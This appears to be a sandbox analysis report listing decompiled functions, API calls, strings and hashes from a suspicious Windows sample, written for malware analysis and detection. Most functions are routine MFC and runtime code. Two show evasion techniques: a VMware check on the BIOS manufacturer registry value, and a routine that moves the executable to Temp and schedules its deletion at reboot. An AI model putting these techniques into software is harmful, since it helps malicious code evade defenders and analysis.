Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: e637473e8ed25ec0df4acadf4777be758bd923cb474e29ab85a1803d243357e1
Instruction ID: c0aec3e6681687ce664e6c7e1f34e81b09870f8546fced4acd886bc0c41bbf99
Opcode Fuzzy Hash: e637473e8ed25ec0df4acadf4777be758bd923cb474e29ab85a1803d243357e1
Instruction Fuzzy Hash: 6151CF70E00705CFCB21AFA6C8856AEBAB1AF48706F14463FF502B62D1CB788941CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004094C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004094C0(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t50;
				intOrPtr _t52;
				long _t54;
				intOrPtr* _t55;
				long _t56;
				struct _OVERLAPPED* _t68;
				int _t73;
				void* _t74;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t86;
				void* _t88;
				intOrPtr* _t92;
				char _t93;
				intOrPtr _t102;
				long _t106;
				intOrPtr* _t111;
				void* _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				long _t118;
				void* _t119;
				intOrPtr* _t123;
				signed int _t126;
				void* _t127;
				signed int _t128;

				_t50 =  *0x44f5d0; // 0x8e7de579
				 *(_t126 + 0x340) = _t50 ^ _t126;
				_t123 =  *((intOrPtr*)(_t126 + 0x350));
				_push(_t115);
				_t116 = _t115 | 0xffffffff;
				_t111 = __ecx;
				if( *(_t123 + 4) != _t116) {
					E00408BD0( *_t123, _t116, _t123);
				}
				_t84 =  *((intOrPtr*)(_t126 + 0x35c));
				 *(_t123 + 4) = _t116;
				_t117 =  *_t123;
				if(_t84 <  *((intOrPtr*)(_t117 + 4))) {
					__eflags = _t84 -  *((intOrPtr*)(_t117 + 0x10));
					if(_t84 <  *((intOrPtr*)(_t117 + 0x10))) {
						E004085A0(_t117);
					}
					_t52 =  *_t123;
					__eflags =  *((intOrPtr*)(_t52 + 0x10)) - _t84;
					if( *((intOrPtr*)(_t52 + 0x10)) < _t84) {
						do {
							E004085E0( *_t123);
							_t102 =  *_t123;
							__eflags =  *((intOrPtr*)(_t102 + 0x10)) - _t84;
						} while ( *((intOrPtr*)(_t102 + 0x10)) < _t84);
					}
					E00408E60(_t123, _t126 + 0x20, _t84);
					__eflags =  *(_t126 + 0x124) & 0x00000010;
					_t54 =  *_t111;
					if(( *(_t126 + 0x124) & 0x00000010) == 0) {
						__eflags = _t54;
						_t85 = _t111;
						_t92 = _t111;
						while(_t54 != 0) {
							__eflags = _t54 - 0x2f;
							if(_t54 == 0x2f) {
								L20:
								_t15 = _t92 + 1; // 0x1
								_t85 = _t15;
							} else {
								__eflags = _t54 - 0x5c;
								if(_t54 == 0x5c) {
									goto L20;
								}
							}
							_t54 =  *((intOrPtr*)(_t92 + 1));
							_t92 = _t92 + 1;
							__eflags = _t54;
						}
						_t55 = _t111;
						_t106 = _t126 + 0x148 - _t111;
						__eflags = _t106;
						do {
							_t93 =  *_t55;
							 *((char*)(_t106 + _t55)) = _t93;
							_t55 = _t55 + 1;
							__eflags = _t93;
						} while (_t93 != 0);
						__eflags = _t85 - _t111;
						if(_t85 != _t111) {
							 *((char*)(_t126 + _t85 - _t111 + 0x148)) = 0;
							_t56 =  *((intOrPtr*)(_t126 + 0x148));
							__eflags = _t56 - 0x2f;
							if(_t56 == 0x2f) {
								L33:
								wsprintfA(_t126 + 0x254, "%s%s", _t126 + 0x14c, _t85);
								_t109 = _t126 + 0x158;
								E004093A0(_t85, _t123, 0, _t126 + 0x158);
								_t127 = _t126 + 0x18;
								goto L27;
							} else {
								__eflags = _t56 - 0x5c;
								if(_t56 == 0x5c) {
									goto L33;
								} else {
									__eflags = _t56;
									if(_t56 == 0) {
										goto L26;
									} else {
										__eflags =  *((char*)(_t126 + 0x149)) - 0x3a;
										if( *((char*)(_t126 + 0x149)) != 0x3a) {
											goto L26;
										} else {
											goto L33;
										}
									}
								}
							}
							L49:
						} else {
							 *((char*)(_t126 + 0x148)) = _t93;
							L26:
							wsprintfA(_t126 + 0x258, "%s%s%s", _t123 + 0x140, _t126 + 0x14c, _t85);
							_t109 = _t126 + 0x15c;
							E004093A0(_t85, _t123, _t123 + 0x140, _t126 + 0x15c);
							_t127 = _t126 + 0x1c;
						}
						L27:
						_t86 = CreateFileA(_t127 + 0x264, 0x40000000, 0, 0, 2,  *(_t127 + 0x124), 0);
						__eflags = _t86 - 0xffffffff;
						if(_t86 != 0xffffffff) {
							_t109 =  *(_t123 + 0x138);
							_push( *(_t123 + 0x138));
							E00408810( *_t123);
							_t128 = _t127 + 4;
							__eflags =  *(_t123 + 0x13c);
							if(__eflags == 0) {
								_t74 = E0040A3F7(__eflags, 0x4000);
								_t128 = _t128 + 4;
								 *(_t123 + 0x13c) = _t74;
							}
							 *(_t128 + 0x14) = 0;
							while(1) {
								_t118 = E00408990( *_t123, 0x4000,  *(_t123 + 0x13c), _t128 + 0x13);
								_t128 = _t128 + 8;
								__eflags = _t118 - 0xffffff96;
								if(_t118 == 0xffffff96) {
									break;
								}
								__eflags = _t118;
								if(__eflags < 0) {
									L43:
									 *(_t128 + 0x14) = 0x5000000;
								} else {
									if(__eflags <= 0) {
										L41:
										__eflags =  *((char*)(_t128 + 0x13));
										if( *((char*)(_t128 + 0x13)) != 0) {
											_t109 = _t128 + 0x12c;
											SetFileTime(_t86, _t128 + 0x138, _t128 + 0x12c, _t128 + 0x138);
										} else {
											__eflags = _t118;
											if(_t118 != 0) {
												continue;
											} else {
												goto L43;
											}
										}
									} else {
										_t109 = _t128 + 0x1c;
										_t73 = WriteFile(_t86,  *(_t123 + 0x13c), _t118, _t128 + 0x1c, 0);
										__eflags = _t73;
										if(_t73 == 0) {
											 *(_t128 + 0x14) = 0x400;
										} else {
											goto L41;
										}
									}
								}
								L47:
								CloseHandle(_t86);
								E00408BD0( *_t123, _t118, _t123);
								_t68 =  *(_t128 + 0x14);
								goto L48;
							}
							 *(_t128 + 0x14) = 0x1000;
							goto L47;
						} else {
							_t68 = 0x200;
						}
					} else {
						__eflags = _t54 - 0x2f;
						if(_t54 == 0x2f) {
							L14:
							E004093A0(_t84, _t123, 0, _t111);
							_t128 = _t126 + 8;
							_t68 = 0;
						} else {
							__eflags = _t54 - 0x5c;
							if(_t54 == 0x5c) {
								goto L14;
							} else {
								__eflags = _t54;
								if(_t54 == 0) {
									L15:
									E004093A0(_t84, _t123 + 0x140, _t123 + 0x140, _t111);
									_t128 = _t126 + 8;
									_t68 = 0;
								} else {
									__eflags =  *((char*)(_t111 + 1)) - 0x3a;
									if( *((char*)(_t111 + 1)) != 0x3a) {
										goto L15;
									} else {
										goto L14;
									}
								}
							}
						}
					}
				} else {
					_t68 = 0x10000;
				}
				L48:
				_pop(_t114);
				_pop(_t119);
				_pop(_t88);
				return E0042569C(_t68, _t88,  *(_t128 + 0x350) ^ _t128, _t109, _t114, _t119);
				goto L49;
			}

0x004094c6
0x004094cd
0x004094d6
0x004094dd
0x004094de
0x004094e5
0x004094e7
0x004094ec
0x004094ec
0x004094f1
0x004094f8
0x004094fb
0x00409501
0x0040950d
0x00409510
0x00409512
0x00409512
0x00409517
0x0040951a
0x0040951d
0x00409520
0x00409523
0x00409528
0x0040952b
0x0040952b
0x00409520
0x00409537
0x0040953c
0x00409544
0x00409546
0x00409583
0x00409585
0x00409587
0x00409589
0x00409590
0x00409592
0x00409598
0x00409598
0x00409598
0x00409594
0x00409594
0x00409596
0x00000000
0x00000000
0x00409596
0x0040959b
0x0040959e
0x004095a1
0x004095a1
0x004095ac
0x004095ae
0x004095ae
0x004095b0
0x004095b0
0x004095b2
0x004095b5
0x004095b8
0x004095b8
0x004095bc
0x004095be
0x00409633
0x0040963b
0x00409642
0x00409644
0x00409660
0x00409676
0x0040967c
0x00409686
0x0040968b
0x00000000
0x00409646
0x00409646
0x00409648
0x00000000
0x0040964a
0x0040964a
0x0040964c
0x00000000
0x00409652
0x00409652
0x0040965a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040965a
0x0040964c
0x00409648
0x00000000
0x004095c0
0x004095c0
0x004095c7
0x004095e4
0x004095ea
0x004095f3
0x004095f8
0x004095f8
0x004095fb
0x0040961e
0x00409620
0x00409623
0x00409693
0x0040969c
0x0040969d
0x004096a2
0x004096a5
0x004096ac
0x004096b3
0x004096b8
0x004096bb
0x004096bb
0x004096c7
0x004096d0
0x004096e9
0x004096eb
0x004096ee
0x004096f1
0x00000000
0x00000000
0x004096f3
0x004096f5
0x0040971a
0x0040971a
0x004096f7
0x004096f7
0x0040970f
0x0040970f
0x00409714
0x00409740
0x00409751
0x00409716
0x00409716
0x00409718
0x00000000
0x00000000
0x00000000
0x00000000
0x00409718
0x004096f9
0x00409701
0x00409709
0x0040970b
0x0040970d
0x0040972e
0x00000000
0x00000000
0x00000000
0x0040970d
0x004096f7
0x00409757
0x00409758
0x00409761
0x00409766
0x00000000
0x00409766
0x00409724
0x00000000
0x00409625
0x00409625
0x00409625
0x00409548
0x00409548
0x0040954a
0x0040955a
0x0040955d
0x00409562
0x00409565
0x0040954c
0x0040954c
0x0040954e
0x00000000
0x00409550
0x00409550
0x00409552
0x0040956c
0x00409574
0x00409579
0x0040957c
0x00409554
0x00409554
0x00409558
0x00000000
0x00000000
0x00000000
0x00000000
0x00409558
0x00409552
0x0040954e
0x0040954a
0x00409503
0x00409503
0x00409503
0x0040976a
0x00409771
0x00409772
0x00409774
0x00409782
0x00000000

Strings

%s%s, xrefs: 00409670
:, xrefs: 00409652
%s%s%s, xrefs: 004095DE

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFile
String ID: %s%s$%s%s%s$:
API String ID: 3401506121-3034790606
Opcode ID: 5a505b145ee6f5bea3e255a0700a2dba384a359b7c46ef74d87cf3ddeeb1b0d5
Instruction ID: 45e847b317bac9fb1a2ee644c9baaa17c33602d330d144c5589628bfc4c73708
Opcode Fuzzy Hash: 5a505b145ee6f5bea3e255a0700a2dba384a359b7c46ef74d87cf3ddeeb1b0d5
Instruction Fuzzy Hash: BE710672504344ABD731DF25DC40BEB73A9AB85304F04493EF9896B2C3D679AD09C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00412522, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00412522(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E0042720D(E0043A1CE, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E00410E42(1, _t71,  *(_t71 + 0x14));
					E00412436(_t60, _t64, E00410E42(1, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E004124AC(1, _t64, _t66, E00410E42(1, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E0040FB8C(E00410E42(1, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E00411417(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E004272B2( *(_t71 - 0x14));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 00412529
GetPropA.USER32 ref: 00412538
CallWindowProcA.USER32 ref: 00412592

Part of subcall function 00411417: GetWindowRect.USER32 ref: 0041143F
Part of subcall function 00411417: GetWindow.USER32(?,00000004), ref: 0041145C

SetWindowLongA.USER32 ref: 004125B9
RemovePropA.USER32 ref: 004125C1
GlobalFindAtomA.KERNEL32 ref: 004125C8
GlobalDeleteAtom.KERNEL32 ref: 004125CF

Part of subcall function 0040FB8C: GetWindowRect.USER32 ref: 0040FB98

CallWindowProcA.USER32 ref: 00412623

Strings

AfxOldWndProc423, xrefs: 00412531, 00412536, 004125BF, 004125C7

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: de73c9b9bbed4b31c7534c8c9bcf3ec54b7ca93f9c3fc024da91e274e49d6625
Instruction ID: bfdee4dfbf5cee67ebd2cdc0bd762b011c795b2d4007a425742d0c6953707eb7
Opcode Fuzzy Hash: de73c9b9bbed4b31c7534c8c9bcf3ec54b7ca93f9c3fc024da91e274e49d6625
Instruction Fuzzy Hash: 8831417280021ABBCF11AFA5DE49DFF7A79AF49311F00412AFA01E2151C7B85D619B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042A8FD, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0042A8FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(0xc);
				_push(0x44a838);
				E00428FAC(__ebx, __edi, __esi);
				_t20 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t40 - 0x1c) = _t20;
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x44fed0;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				if(_t20 != 0) {
					_t31 = GetProcAddress;
					 *((intOrPtr*)(_t39 + 0x1f8)) = GetProcAddress(_t20, "EncodePointer");
					 *((intOrPtr*)(_t39 + 0x1fc)) = GetProcAddress( *(_t40 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x44f6d0;
				InterlockedIncrement(0x44f6d0);
				E0042E21D(_t31, 1, 0xc);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t24 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t24;
				if(_t24 == 0) {
					_t28 =  *0x44fcd8; // 0x44fc00
					 *((intOrPtr*)(_t39 + 0x6c)) = _t28;
				}
				_push( *((intOrPtr*)(_t39 + 0x6c)));
				E0042DE2C();
				 *(_t40 - 4) = 0xfffffffe;
				return E00428FF1(E0042A9A8());
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,0044A838,0000000C,0042AA0F,00000000,00000000,?,0040A3E6,00000000,?,00000000,00415543,0000000C,00000004,00401D16,?), ref: 0042A90E
GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0042A937
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0042A947
InterlockedIncrement.KERNEL32(0044F6D0), ref: 0042A969
__lock.LIBCMT ref: 0042A971
___addlocaleref.LIBCMT ref: 0042A990

Strings

EncodePointer, xrefs: 0042A92B
KERNEL32.DLL, xrefs: 0042A909
DecodePointer, xrefs: 0042A93F

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1036688887-2843748187
Opcode ID: 021f050beb51e5ad3499312e6563df30a9bd01ad3e24d482c65bb80c07a6fc98
Instruction ID: ac861ff03db719d2c32bcb7acf636389b5b4215c4e5b963763d84be9a7104e1a
Opcode Fuzzy Hash: 021f050beb51e5ad3499312e6563df30a9bd01ad3e24d482c65bb80c07a6fc98
Instruction Fuzzy Hash: F21170B0A407019FE7109F7AE805B5ABBE0EF04314F50892FE5A9972A1CB78A950CF59

Uniqueness

Uniqueness Score: -1.00%

Function 1000343E, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000343E() {
				char _v264;
				char _v524;

				GetModuleFileNameA(0,  &_v524, 0x104);
				 *0x100273bc(0,  &_v264, 0x1c, 0);
				strcat( &_v264, "\\Temp");
				wsprintfA( &_v264, "%s\\%d.exe",  &_v264, GetTickCount());
				MoveFileA( &_v524,  &_v264);
				return MoveFileExA( &_v264, 0, 4);
			}

0x10003455
0x10003468
0x1000347a
0x1000349b
0x100034b2
0x100034ca

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10003455
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10003468
strcat.MSVCRT(?,\Temp), ref: 1000347A
GetTickCount.KERNEL32 ref: 10003481
wsprintfA.USER32 ref: 1000349B
MoveFileA.KERNEL32(?,?), ref: 100034B2
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 100034C3

Strings

\Temp, xrefs: 10003474
%s\%d.exe, xrefs: 10003495

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Move$CountFolderModuleNamePathSpecialTickstrcatwsprintf
String ID: %s\%d.exe$\Temp
API String ID: 3999276209-59792473
Opcode ID: 8529988838291d1c7413853b12b584142bc9b6f1f11caa71cba24cf5fcb8bfae
Instruction ID: 00bf437c71667580649d86af3319f58313e1a8c8b1321c389b9fc72c737e63c5
Opcode Fuzzy Hash: 8529988838291d1c7413853b12b584142bc9b6f1f11caa71cba24cf5fcb8bfae
Instruction Fuzzy Hash: 110112B694021CABEB20E7A0CDC9FDA777CBB18705F5001D1F749D5091DBB0A6858F65

Uniqueness

Uniqueness Score: -1.00%

Function 10002842, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 39
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10002842() {
				void* _v8;
				int _v12;
				char _v76;
				char* _t15;

				_v12 = 0x3f;
				if(RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\BIOS\\", 0, 0x20019,  &_v8) != 0) {
					L4:
					return 0;
				} else {
					RegQueryValueExA(_v8, "SystemManufacturer", 0, 0,  &_v76,  &_v12);
					_t15 = strstr( &_v76, "VMWARE");
					_push(_v8);
					if(_t15 == 0) {
						RegCloseKey();
						goto L4;
					} else {
						RegCloseKey();
						return 1;
					}
				}
			}

0x1000284b
0x1000286c
0x100028b0
0x100028b3
0x1000286e
0x10002882
0x10002891
0x10002899
0x1000289e
0x100028aa
0x00000000
0x100028a0
0x100028a0
0x100028a9
0x100028a9
0x1000289e

APIs

RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\BIOS\,00000000,00020019,1000BDED), ref: 10002864
RegQueryValueExA.ADVAPI32(1000BDED,SystemManufacturer,00000000,00000000,?,0000003F), ref: 10002882
strstr.MSVCRT ref: 10002891
RegCloseKey.ADVAPI32(1000BDED,?,?,?,?,?,?,?,?,?,?,?,?,?,100029C5), ref: 100028A0
RegCloseKey.ADVAPI32(1000BDED,?,?,?,?,?,?,?,?,?,?,?,?,?,100029C5), ref: 100028AA

Strings

HARDWARE\DESCRIPTION\System\BIOS\, xrefs: 1000285A
VMWARE, xrefs: 1000288B
?, xrefs: 1000284B
SystemManufacturer, xrefs: 1000287A

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Close$OpenQueryValuestrstr
String ID: ?$HARDWARE\DESCRIPTION\System\BIOS\$SystemManufacturer$VMWARE
API String ID: 1894186585-3728474139
Opcode ID: b2239b2ce5f1c045fdce7dc76bcd01b7dcc2b4ae620b514edfd288b2b048e2e5
Instruction ID: 74ae9b9a8c276582cb7bd5ba5b38fe752946a374c903f0c8e85ff2cf3b110dc7
Opcode Fuzzy Hash: b2239b2ce5f1c045fdce7dc76bcd01b7dcc2b4ae620b514edfd288b2b048e2e5
Instruction Fuzzy Hash: E9F0F974600219FFFB01DBA0DC8AFDEBBBCEB08788F604055F605E1090EB70A6499B14

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040C5C2(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E0042720D(E00439A81, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E0040E67F(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E0040E67F(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E004136E3(_t103, _t104, 0, _t129, _t136, 0x10);
				E004136E3(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E004272B2(_t65);
					}
					E00401FA0(_t132 - 0x1c, E004151D0());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E0042082C(_t103, _t132, __eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x452834; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E004128B9(_t103, 0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E0040C03D, 0);
							E00401E60( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E00410EEA(_t103, 0, _t131, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E004207F5(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E00420753(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E0042048B(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E0042047D(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E00404380(_t103, _t132 - 0x1c, 0, _t130, _t132, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 0040C5C9
GetSystemMetrics.USER32 ref: 0040C67A
GlobalLock.KERNEL32 ref: 0040C6E3
CreateDialogIndirectParamA.USER32(?,?,?,0040C03D,00000000), ref: 0040C712

Strings

MS Shell Dlg, xrefs: 0040C684

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
